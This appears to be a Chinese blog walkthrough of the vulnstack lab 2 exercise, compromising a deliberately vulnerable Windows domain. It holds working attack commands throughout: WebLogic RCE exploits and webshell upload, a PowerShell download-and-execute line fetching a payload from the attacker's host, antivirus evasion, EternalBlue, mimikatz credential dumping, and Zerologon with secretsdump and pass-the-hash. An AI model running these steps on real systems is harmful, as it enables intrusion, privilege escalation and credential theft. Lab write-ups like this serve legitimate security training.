vulnstack(红日)内网渗透靶场二: 免杀360拿下域控

痛定思痛。 2023-10-11 23:27 40阅读 0赞

## 前言 ##

在我之前的文章[vulnstack(一)打靶][vulnstack]，我主要依赖Cobalt Strike进行后期渗透测试，这次我计划使用Metasploit框架(MSF)来进行这个阶段的工作。这个靶场与之前的不同之处在于它的WEB服务器安装了360安全卫士。虽然这增加了挑战的难度，但只要我们能够成功地进行免杀处理，就可以顺利进行渗透

## 靶场考察知识 ##

### 1.weblogic漏洞 ###

Oracle WebLogic是一个基于Java EE的应用服务器，是Oracle的云应用基础架构的关键组成部分。它支持创建、部署和运行分布式多层Java EE应用程序。

尽管WebLogic是一个强大而受欢迎的应用服务器，但它也有一些重要的安全漏洞

*  **CVE-2017-3506**：这是一个在WebLogic服务器中发现的远程代码执行（RCE）漏洞。它影响了WebLogic的WLS Security组件（针对WebLogic Server 10.3.6.0和12.1.3.0版本）。攻击者可以通过网络利用这个漏洞，无需用户交互或用户认证。如果成功，攻击者可以在WebLogic服务器主机上完全接管控制权。
 *  **CVE-2019-2725**：这也是一个远程代码执行（RCE）漏洞，影响WebLogic服务器中的某个可反序列化组件。该漏洞在WebLogic服务器10.3.6.0和12.1.3.0版本中存在。成功利用该漏洞的攻击者可以通过网络，无需有效用户认证，控制受影响的系统。这个漏洞与CVE-2017-3506相似，但影响的组件和可利用的方式略有不同

### 2.CVE-2020-1472 ###

CVE-2020-1472是一个严重的Windows安全漏洞，被微软命名为"Zerologon"。它存在于Windows服务器的Netlogon远程协议中，该协议被用于各种任务，包括用户和机器身份验证。这个漏洞由Dutch security firm Secura的研究人员发现。

Zerologon漏洞使攻击者能够在网络上的任何位置完全接管域控制器，并在没有用户交互的情况下执行此操作。一旦控制了域控制器，攻击者就可以执行各种恶意活动，例如添加新的域管理员账户，重置现有账户密码，执行代码等

## 靶场搭建 ##

### 拓扑图 ###

![img][]

### 主机IP配置 ###

此靶场用户的统一密码均为：`1qaz@WSX` 。NAT网卡为外网IP，其网段为`192.168.47.0/24`；VMnet3为内网IP，其网段为`10.10.10.0/24`

<table> 
 <thead> 
  <tr> 
   <th>虚拟机系统</th> 
   <th>网卡</th> 
   <th>IP</th> 
   <th>登录用户</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>kali（攻击机）</td> 
   <td>NAT</td> 
   <td>192.168.47.155</td> 
   <td></td> 
  </tr> 
  <tr> 
   <td>WEB（域内主机）</td> 
   <td>NAT<br>VMnet3</td> 
   <td>192.168.47.129<br>10.10.10.80</td> 
   <td>mssql</td> 
  </tr> 
  <tr> 
   <td>DC（域控主机）</td> 
   <td>VMnet3</td> 
   <td>10.10.10.10</td> 
   <td>de1ay</td> 
  </tr> 
  <tr> 
   <td>PC（域内主机）</td> 
   <td>NAT<br>VMnet3</td> 
   <td>192.168.47.160<br>10.10.10.201</td> 
   <td>mssql</td> 
  </tr> 
 </tbody> 
</table>

### WEB主机配置 ###

首先将WEB主机的快照至恢复至v1.3

![image-20230425201003236][]

输入`.\de1ay`表示登录本地的de1ay用户而非域用户

![image-20230425202559121][]

随后要求你重置密码，点击确定

![image-20230425202641813][]

此处我将密码重置为`qQ123456`，要注意的是，de1ay用户是本地管理员

![image-20230425202702994][]

注销本地的de1ay用户，随后切换至de1ay域的mssql用户，这样做的是目的是提升难度，而不会一拿到的shell就是管理员权限

![1][]

以管理员权限运行:`C:\Oracle\Middleware\user_projects\domains\base_domain\bin\strartWebLogic.cmd`

![image-20230425210814996][]

打开物理机访问`192.168.47.129:7001`，测试WEB机的Weblogic服务是否运行成功，若出现以下界面则表示运行成功

![image-20230425213343109][]

### PC主机配置 ###

同理, PC机也更改一下本地的de1ay用户的密码

![image-20230425215909510][]

登录PC机后出现弹框，提示360运行需要管理员用户的权限

![image-20230425203622494][]

## Web渗透 ##

### 信息收集 ###

#### 1.namp扫描 ####

使用nmap扫描存活主机：`nmap -sn 192.168.47.0/24`，发现两台主机，分别是`192.168.47.129`和`192.168.47.160`

![image-20230427222637596][]

扫描第一个主机的开放端口：`nmap -p- 192.168.47.129`，http服务的80端口，mssql的1433端口，远程登录服务的3389端口，以及weblogic的7001端口，猜测这台机器很可能是web服务器

![image-20230427223120393][]

扫描另外一个主机：`nmap -p- 192.168.47.160`，这台机器应该是员工区的PC机

![image-20230427223819087][]

扫描指定端口的常见漏洞：`nmap --script=vuln -p 80,135,139,445,1688,3389,7001 192.168.47.129`，发现永恒之蓝ms17-010漏洞

![image-20230427231454638][]

`nmap --script=vuln -p 135,139,445,3389 192.168.47.160`, pc机也发现了永恒之蓝漏洞

![image-20230427224712874][]

#### 2.dirsearch目录爆破 ####

对web主机进行目录爆破，先爆80端口： `python3 dirsearch.py -u http://192.168.47.129 -e* -x 403,404`，没有可用信息

![image-20230428120338028][]

继续爆weblogic服务的7001端口：`python3 dirsearch.py -u http://192.168.47.129:7001 -e* -x 403,404`

![image-20230428125935638][]

访问控制台登录页面：`/console/login/LoginForm.jsp`，爆出敏感信息：weblogic的版本号为10.3.3.0

![image-20230428130139833][]

#### 3.weblogic漏洞扫描 ####

使用weblogic漏扫工具扫描：`python3 WeblogicScan.py -u 192.168.47.129 -p 7001`，爆出`CVE-2017-3506`以及`CVE-2019-2725`，均为远程代码执行漏洞

![image-20230428132119263][]

### 漏洞利用 ###

#### 1.ms07010漏洞利用 ####

尝试使用MSF的ms17010远程命令执行EXP，但是失败了，估计是被360拦截掉了

![image-20230427231823163][]

换另外一个EXP，尝试返回目标主机的meterpreter会话：`use exploit/windows/smb/ms17_010_eternalblue` ，但还是失败了，在web机可以看到是被360拦截了

![image-20230427232137536][]

![1][1 1]

#### 2.weblogic漏洞利用 ####

msf搜索与weblogic相关的漏洞，根据之前漏扫爆出来的漏洞编号选择对应的年份(2017和2019)，此处选择2019的

![1][1 2]

![1][1 3]

这里需修改EXP的设置, 由于目标主机是windows，需将target设为1，其他设置如下图所示，成功返回一个meterpreter会话，也能够正常获取uid， 但是很快就被360干掉了

![image-20230429120030747][]

![image-20230429120143693][]

使用cve-2017-3506的exp扫描漏洞是否存在：`java -jar .\WebLogic-XMLDecoder.jar -u http://192.168.47.129:7001`

![image-20230429131419649][]

使用cve-2017-3506的漏洞利用exp：`java -jar .\WebLogic-XMLDecoder.jar -s http://192.168.47.129:7001 /wls-wsat/CoordinatorPortType11 shell.jsp`

![image-20230429132144382][]

访问写进去的webshell(shell.jsp)执行任意命令，命令执行成功

![image-20230429132027418][]

尝试远程加载cs的powershell命令：`http://192.168.47.129:7001/wls-wsat/shell.jsp?password=secfree&command=powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.155:80/a'))"`， 但是执行失败了，cs没有上线

![image-20230429163717896][]

#### 3.写入webshell ####

尝试一键写入webshell，利用`CVE-2020-2551`漏洞，漏洞利用成功 (此webshell默认密钥为key)

![1][1 4]

打开哥斯拉连接webshell

![1][1 5]

进入webshell，测试执行远程命令

![1][1 6]

上传msf生成的木马，立马被360查杀掉了, 因此需对其做免杀处理, 此处我用到的免杀技术为[动态调用api函数加载shellcode][api_shellcode]

![image-20230503171747538][]

![image-20230503172820475][]

上传免杀后的木马并执行, msf成功接收到meterpreter

![image-20230503202635439][]

![image-20230503202408729][]

## 后渗透 ##

### 内网信息收集 ###

先将`fscan.exe`上传至目标主机

![image-20230503204547893][]

进入cmd shell命令执行：`ipconfig /all`，meterpreter执行命令`sysinfo`来获取目标系统的基本信息，此处获取到的信息整理如下：

*  主机名: WEB
 *  当前域：de1ay
 *  内网ip地址：10.10.10.80
 *  DNS服务器地址：10.10.10.10
 *  OS：Windows 2008 R2
 *  系统架构：64位

![4ff475ab4478bd5ac72ce4011bdd3b42.png][]

![1][1 7]

![1][1 8]

### 内网漏洞扫描 ###

使用fscan.exe扫描内网存活ip以及进行漏洞扫描：`fscan.exe -h 10.10.10.1/24`，发现内网的另一个IP是10.10.10.10，这个IP应该就是域控服务器的IP了，因为DNS服务器通常为域控服务器，而且这个域控服务器还存在永恒之蓝漏洞

![1][1 9]

![1][1 10]

### 永恒之蓝打域控 ###

开启路由转发：`run autoroute -s 10.10.10.0/24`，目标是让msf能够访问内网的其他主机

> 此命令使用autoroute脚本来添加一个静态路由，换句话说，这个命令将你当前的 Meterpreter 会话作为一个路由器，可以让你访问到该子网内的其他主机

![image-20230503231440843][]

尝试使用永恒之蓝exp对域控进行攻击，成功返回域控的meterpreter

![image-20230503231725683][]

### 永恒之蓝提权Web主机 ###

使用MSF查找可能的提权漏洞，使用`post/multi/recon/local_exploit_suggester`模块，Metasploit会建议可能适用于该系统的本地提权漏洞，然后使用run命令执行此模块。

meterpreter > background
    msf > use post/multi/recon/local_exploit_suggester
    msf post(multi/recon/local_exploit_suggester) > set SESSION [your session id]
    msf post(multi/recon/local_exploit_suggester) > run

漏洞扫描被意外终止，具体原因我也不清楚

![image-20230530194243475][]

由于Web主机的当前用户是普通用户，因此需对它进行提权操作，永恒之蓝漏洞可以达到提权的效果，尝试对Web主机的内网IP进行漏洞利用，失败告终

![1][1 11]

![1][1 12]

使用frp内网穿透可以解决上述永恒之蓝漏洞利用失败的情况，首先设置frp服务端的配置文件`frps.ini`

[common]
    bind_port = 7000  
    
    [socks5]
    type = tcp
    auth_method = noauth  #表示这个代理不需要验证。如果你需要验证，可以设置为 userpass 并提供 username 和 password
    bind_addr = 0.0.0.0
    listen_port = 1080

kali执行命令启用frp服务端: `./frps -c ./frps.ini`

![image-20230529235913739][]

如下所示设置客户端的配置文件`frpc.ini` ，随后将`frpc.exe`和`frpc.ini`都上传至web机上

[common]
    server_addr = 192.168.47.155
    server_port = 7000
    
    [socks5]
    type = tcp
    remote_port = 1080
    plugin = socks5  #用SOCKS5代理插件

`setg proxies socks5:192.168.47.155:1080`：setg命令用于设置全局选项,也就是说后续的所有网络操作都将通过这个socks5代理进行

`setg ReverseAllowProxy true`：将允许Metasploit的反向连接（reverse connections）通过代理,反向连接通常用于在成功利用某个漏洞后与目标系统建立连接，用于发送命令和接收结果

![image-20230527165347717][]

payload必须设置为`bind_tcp`, 设置`rhost`为web主机的内网ip

![image-20230527172530748][]

exp运行后成功返回当前Web主机的meterpreter会话

![image-20230527172823829][]

### mimikatz凭据提取 ###

`getuid`查看当前用户权限为`system`, 这就意味着可以使用mimikatz进行凭据提取了

![image-20230527172908844][]

加载mimikatz：`load kiwi`

![image-20230527173155313][]

获取凭据：`creds_all`，这个命令将尝试提取存储在内存中的各种凭据

![image-20230527173303819][]

![image-20230527173717054][]

以下表格是上述获取到的凭据

<table> 
 <thead> 
  <tr> 
   <th>域</th> 
   <th>账号和密码</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>DE1AY</td> 
   <td>Administrator/1qaz@WSX</td> 
  </tr> 
  <tr> 
   <td>DE1AY</td> 
   <td>mssql/1qaz@WS</td> 
  </tr> 
  <tr> 
   <td>WEB</td> 
   <td>de1ay/qQ123456</td> 
  </tr> 
 </tbody> 
</table>

### `CVE-2020-1472`打域控 ###

修改proxychains的配置文件：`vim etc/proxychains4.conf`， 添加上socks5代理，其目的是让其他应用程序能够访问目标内网

![image-20230527235349333][]

使用`zerologon_tester.py`来测试域控是否存在`CVE-2020-1472`漏洞，结果显示漏洞存在

proxychains4 python3 zerologon_tester.py [域控主机名] [域控ip]

![image-20230527235651822][]

使用`cve-2020-1472-exploit`将域控制器账户的密码设置为空

> 域控制器账户是一个特殊的系统账户，用于运行域控制器服务和进行与其他系统的通信。这个账户通常是不可见的，并且不能用来登录或执行常规的用户操作
> 
> 而"Administrator"通常是域管理员账户的默认名称，它拥有可以管理整个域，包括所有用户、计算机和服务的权限
> 
> 在许多情况下，域管理员账户（例如Administrator）有足够的权限来管理域控制器和其它网络资源。然而，正如CVE-2020-1472（Zerologon）漏洞所展示的，攻击者如果能够以某种方式获得域控制器账户的权限，他们可能会绕过正常的认证机制并直接控制域控制器
> 
> 所以总的来说，域控制器账户并不等同于Administrator账户，虽然两者都具有高级权限

proxychains4 python3 cve-2020-1472-exploit.py [域控名称] [域控ip]

![image-20230528000136748][]

以下命令试图通过IP地址`10.10.10.10`访问`de1ay.com`域中的机器账户`dc$`，并且在这个过程中不需要密码，成功之后，它将尝试从目标服务器抓取并输出密码哈希值和其他凭据信息。此处将域管理员账户Administrator的哈希值复制下来。

proxychains impacket-secretsdump de1ay.com/dc\$@10.10.10.10 -no-pass

> `impacket-secretsdump`是Impacket库的一个工具，用于抓取Windows服务器的密码哈希值和其他凭据信息
> 
> `-no-pass`：这是一个参数，表示我们在尝试访问目标服务器时不会提供密码。这个参数通常在已知存在某种漏洞（比如CVE-2020-1472）可以让我们在没有密码的情况下访问目标服务器时使用

![3e372d379f57ef7dc245afad439ed40b.png][]

以下命令利用`impacket-wmiexec`工具以及提供的NTLM哈希值，在IP地址为`10.10.10.10`的远程Windows服务器上以`administrator`用户的身份执行命令

proxychains impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 administrator@10.10.10.10

> `impacket-wmiexec`：这是Impacket库中的一个工具，它可以在远程Windows服务器上执行命令
> 
> `-hashes`：这个选项允许你提供NTLM哈希值来进行身份验证，而不是使用密码，在这个命令中，你提供了一个LM哈希值（`aad3b435b51404eeaad3b435b51404ee`）和一个NTLM哈希值（`161cff084477fe596a5db81874498a24`）
> 
> `./administrator@10.10.10.10`：这表示你希望以`administrator`用户的身份登录到IP地址为`10.10.10.10`的远程服务器

![image-20230528002213882][]

`reg save`命令将指定注册表键保存到指定文件，其目的是为了后续破解用户密码

*  `reg save HKLM\SYSTEM system.save` ：`HKLM\SYSTEM` 键包含了关于操作系统配置的信息
 *  `reg save HKLM\SAM sam.save` ：`HKLM\SAM` 键包含了关于用户和用户组的信息
 *  `reg save HKLM\SECURITY security.save`：`HKLM\SECURITY` 键包含了关于系统安全设置的信息

![1][1 13]

![1][1 14]

使用`lget`命令从远程系统下载文件到本地系统，再使用`del`命令将这些文件从远程系统中删除

> `lget` 命令常用在一些远程管理和操作的环境中，例如交互式shell会话或者一些远程执行工具中，用于从远程系统下载文件到本地系统

![image-20230528133504199][]

尝试添加新用户，但是失败了，猜测可能是密码的设置强度问题

![image-20230528143508278][]

参考之前获取到的域控账户的密码`1qaz@WSX`，此处我也将新用户的密码设置成和他一样的，添加成功了

net user Henry 1qaz@WSX /add /domain

![image-20230528143557222][]

添加用户至管理员组: `net group "Domain Admins" Henry /add /domain`

![image-20230528143715023][]

查询管理员组是否有刚添加的用户: `net group "Domain Admins"`

![image-20230528143747571][]

查看本地目录，可以看到远程获取到的三个注册表文件

![image-20230528143818874][]

这条命令是使用 Impacket 库中的 `secretsdump.py` 工具来从本地 Windows 注册表文件中提取凭据，将哈希值复制下来用于后续恢复域控制器账户的密码

impacket-secretsdump -sam sam.save -system system.save -security security.save local

![image-20230528172110062][]

使用`reinstall_original_pw.py`，用于恢复域控制器账户的密码

proxychains python3 reinstall_original_pw.py dc 10.10.10.10 <hex值>

![image-20230528173245217][]

再次尝试抓取域控制器账户的密码，若提示登录失败，则表示域控账户恢复成功

![image-20230528173551705][]

### 登录域控主机 ###

由于web主机开启了3389端口，使用`rdesktop`远程登录，账户密码就用mimikatz抓取到的`WEB\de1ay 1qaz@WSX`

![image-20230528174554293][]

在运行对话框中输入`mstsc`呼出远程桌面连接

![1][1 15]

关闭域控机器的防火墙

![1][1 16]

查看域内主机都有哪些

![1][1 17]

通过ping主机名获取PC主机的内网IP

![1][1 18]

尝试使用管理员账户远程登录PC机, 登录成功

![1][1 19]

## 总结 ##

*  当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时，一个替代方案是首先利用frp实现内网穿透，然后再进行漏洞利用。这种方法可能会产生意想不到的效果。
 *  我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口，随后使用rdesktop进行远程登录。然而，这一计划并未成功，我推测这可能是因为域控做了某些限制，只允许10.10.10.0/24网段的主机进行远程登录。

[vulnstack]: https://blog.csdn.net/xf555er/article/details/127384012
[img]: https://img-blog.csdnimg.cn/img_convert/38c25437a55421d2f1f90070ac6237f7.png
[image-20230425201003236]: https://img-blog.csdnimg.cn/img_convert/0aea25cf97f916c67874f961786ab42c.png
[image-20230425202559121]: https://img-blog.csdnimg.cn/img_convert/fe5cd0aa63c2f3e454ca72aee1ff17aa.png
[image-20230425202641813]: https://img-blog.csdnimg.cn/img_convert/0252bad370a1de3195e87a0329554dbe.png
[image-20230425202702994]: https://img-blog.csdnimg.cn/img_convert/0062e89b0fb0352d4120fa247c26bc11.png
[1]: https://img-blog.csdnimg.cn/img_convert/25256b0da67bd927321f9071dbd044b1.png
[image-20230425210814996]: https://img-blog.csdnimg.cn/img_convert/70759bd5c1437efc435fd290e6acc8c5.png
[image-20230425213343109]: https://img-blog.csdnimg.cn/img_convert/126a013090bbf8b275629e84b09530eb.png
[image-20230425215909510]: https://img-blog.csdnimg.cn/img_convert/449ade097f281cffb6d2fdd9fd9c2b8f.png
[image-20230425203622494]: https://img-blog.csdnimg.cn/img_convert/6d2c7d5ae14878d2335d47b3fb4dff68.png
[image-20230427222637596]: https://img-blog.csdnimg.cn/img_convert/9629a403f85b8b17709b98f70edfe3a4.png
[image-20230427223120393]: https://img-blog.csdnimg.cn/img_convert/b91e1c04a36ffa4f1d356f08c01f1220.png
[image-20230427223819087]: https://img-blog.csdnimg.cn/img_convert/4dab3f456c507bd1084edf988d795731.png
[image-20230427231454638]: https://img-blog.csdnimg.cn/img_convert/e4dd2f60b7dd6ec2e97bbc97c420b582.png
[image-20230427224712874]: https://img-blog.csdnimg.cn/img_convert/438f6defa618c43ead39de97d921104d.png
[image-20230428120338028]: https://img-blog.csdnimg.cn/img_convert/b3714ea9270d77be04eaad6559970be0.png
[image-20230428125935638]: https://img-blog.csdnimg.cn/img_convert/450a3a4152f205c9f53fb92b498ee645.png
[image-20230428130139833]: https://img-blog.csdnimg.cn/img_convert/ce14e93145228b91d983a016f12a0e54.png
[image-20230428132119263]: https://img-blog.csdnimg.cn/img_convert/5c411e2436f72068f33224ccf876a13c.png
[image-20230427231823163]: https://img-blog.csdnimg.cn/img_convert/d1069639687777ee266d47b52e4abaed.png
[image-20230427232137536]: https://img-blog.csdnimg.cn/img_convert/4de695868c9a129ed469513d4ce6668e.png
[1 1]: https://img-blog.csdnimg.cn/img_convert/400783269f6902ca56246e4e0f5a7556.png
[1 2]: https://img-blog.csdnimg.cn/img_convert/2f89ce1a33a1fd753ca6111fca7e1f26.png
[1 3]: https://img-blog.csdnimg.cn/img_convert/3d27c58005a7ba72ddb1acf247fbffbf.png
[image-20230429120030747]: https://img-blog.csdnimg.cn/img_convert/68a4565a0d26f736bb8b1dab4b6eaa93.png
[image-20230429120143693]: https://img-blog.csdnimg.cn/img_convert/357e5f4779df0038b8c6dac958c42546.png
[image-20230429131419649]: https://img-blog.csdnimg.cn/img_convert/59487cc75d2941681008533f5be6137e.png
[image-20230429132144382]: https://img-blog.csdnimg.cn/img_convert/22841abf4331bf073461e2999e25fd3e.png
[image-20230429132027418]: https://img-blog.csdnimg.cn/img_convert/eb8881332f63f6b88be4e955fcc6532b.png
[image-20230429163717896]: https://img-blog.csdnimg.cn/img_convert/cc9013abbf018c35db14ce2e7ff3ada3.png
[1 4]: https://img-blog.csdnimg.cn/img_convert/cc680c26b758e63befc62fb867921765.png
[1 5]: https://img-blog.csdnimg.cn/img_convert/5f58f105547f95e82818caa2faa8a2e0.png
[1 6]: https://img-blog.csdnimg.cn/img_convert/e307e61d94bcf5a6863fec297a6e1945.png
[api_shellcode]: https://blog.csdn.net/xf555er/article/details/130855421
[image-20230503171747538]: https://img-blog.csdnimg.cn/img_convert/02b97eece9807e2b0007777a2705068b.png
[image-20230503172820475]: https://img-blog.csdnimg.cn/img_convert/8be17d399b3be6ff947a40aa4fb5b25a.png
[image-20230503202635439]: https://img-blog.csdnimg.cn/img_convert/466a483468c790954eb335ed9f0808ec.png
[image-20230503202408729]: https://img-blog.csdnimg.cn/img_convert/3a3199d9bc60ff62eae34f2ad622eacb.png
[image-20230503204547893]: https://img-blog.csdnimg.cn/img_convert/934dd5058c727e64a109b20d355c975b.png
[4ff475ab4478bd5ac72ce4011bdd3b42.png]: https://img-blog.csdnimg.cn/img_convert/4ff475ab4478bd5ac72ce4011bdd3b42.png
[1 7]: https://img-blog.csdnimg.cn/img_convert/755086aa40fa645243bf98c294c49660.png
[1 8]: https://img-blog.csdnimg.cn/img_convert/43b88443a115aeb2315dc6ff108fbad4.png
[1 9]: https://img-blog.csdnimg.cn/img_convert/f9a1c4475ba2470609e5ad1e06ecfe31.png
[1 10]: https://img-blog.csdnimg.cn/img_convert/31c21749c29b15fb068621c2b1907ccd.png
[image-20230503231440843]: https://img-blog.csdnimg.cn/img_convert/930d83875fdb52d107854d734a302ba0.png
[image-20230503231725683]: https://img-blog.csdnimg.cn/img_convert/3ff0068e3884e5db02a1ec8b7b24a592.png
[image-20230530194243475]: https://img-blog.csdnimg.cn/img_convert/57a396602fb99b76cb6c7d0213012057.png
[1 11]: https://img-blog.csdnimg.cn/img_convert/3613b3e0a5009a62712f9c4e8056026d.png
[1 12]: https://img-blog.csdnimg.cn/img_convert/3534eade1ec6a655d5f0436217d9f452.png
[image-20230529235913739]: https://img-blog.csdnimg.cn/img_convert/e1dad2f3e1b79716c2aeafa6656be084.png
[image-20230527165347717]: https://img-blog.csdnimg.cn/img_convert/8ac6f20c427145802c6a803a1a1c9293.png
[image-20230527172530748]: https://img-blog.csdnimg.cn/img_convert/3daa457ffcc87e6c65a899c9e3c31501.png
[image-20230527172823829]: https://img-blog.csdnimg.cn/img_convert/b5ea6450428e050a648570ee9c4cb53d.png
[image-20230527172908844]: https://img-blog.csdnimg.cn/img_convert/ab8635910368e7510b412570620c6995.png
[image-20230527173155313]: https://img-blog.csdnimg.cn/img_convert/6148d418f3532ba272ad01442d1982ab.png
[image-20230527173303819]: https://img-blog.csdnimg.cn/img_convert/3d273e573bd640a5ea09a724499c4655.png
[image-20230527173717054]: https://img-blog.csdnimg.cn/img_convert/013340e2abef5a16d9b6c1b24cf24705.png
[image-20230527235349333]: https://img-blog.csdnimg.cn/img_convert/042b726adf083cf0c50761e5c12af5e8.png
[image-20230527235651822]: https://img-blog.csdnimg.cn/img_convert/a692b782eac7a41dc1c4a27e20d6d611.png
[image-20230528000136748]: https://img-blog.csdnimg.cn/img_convert/53bfc30838470f7d4d3d6a47d99989e2.png
[3e372d379f57ef7dc245afad439ed40b.png]: https://img-blog.csdnimg.cn/img_convert/3e372d379f57ef7dc245afad439ed40b.png
[image-20230528002213882]: https://img-blog.csdnimg.cn/img_convert/13b0d5a83cc25a19512ff0f80189d4bf.png
[1 13]: https://img-blog.csdnimg.cn/img_convert/bc66255a9f9f050f9c41d0a8ac6abed4.png
[1 14]: https://img-blog.csdnimg.cn/img_convert/97e2583289a04b92fdcf5974d7faa358.png
[image-20230528133504199]: https://img-blog.csdnimg.cn/img_convert/7834c5c3cbd3c3b0478d35625159e39d.png
[image-20230528143508278]: https://img-blog.csdnimg.cn/img_convert/77dc0c2f32b8ce852d2840a344562df2.png
[image-20230528143557222]: https://img-blog.csdnimg.cn/img_convert/4ad59ddabcb27002952860377768dfc1.png
[image-20230528143715023]: https://img-blog.csdnimg.cn/img_convert/d8f74493a65644376f473783fd537cf6.png
[image-20230528143747571]: https://img-blog.csdnimg.cn/img_convert/3c809a7beeb55ab819fe9262959e31c8.png
[image-20230528143818874]: https://img-blog.csdnimg.cn/img_convert/13f8fb4d124581c3dc265e21b7e3f5a7.png
[image-20230528172110062]: https://img-blog.csdnimg.cn/img_convert/8160cfe81953ac826b9b342b91385376.png
[image-20230528173245217]: https://img-blog.csdnimg.cn/img_convert/85a2632cccdcc837e0f9e6860e82cedc.png
[image-20230528173551705]: https://img-blog.csdnimg.cn/img_convert/c97b34fb957046d41d8df194889edda0.png
[image-20230528174554293]: https://img-blog.csdnimg.cn/img_convert/6d76d88350553a9be75e7eb4f3d5a5b8.png
[1 15]: https://img-blog.csdnimg.cn/img_convert/a89ef157852cbd7a126a2db70eabf7c1.png
[1 16]: https://img-blog.csdnimg.cn/img_convert/7749bc36a890bd78eff092cfa04bbbc7.png
[1 17]: https://img-blog.csdnimg.cn/img_convert/b0b6d21c36c9302e9e0080e78af45273.png
[1 18]: https://img-blog.csdnimg.cn/img_convert/0b01d5ada458c7726d33a12e4a921b2e.png
[1 19]: https://img-blog.csdnimg.cn/img_convert/7765ba53a8a4f5b302ddd1d084e76cb0.png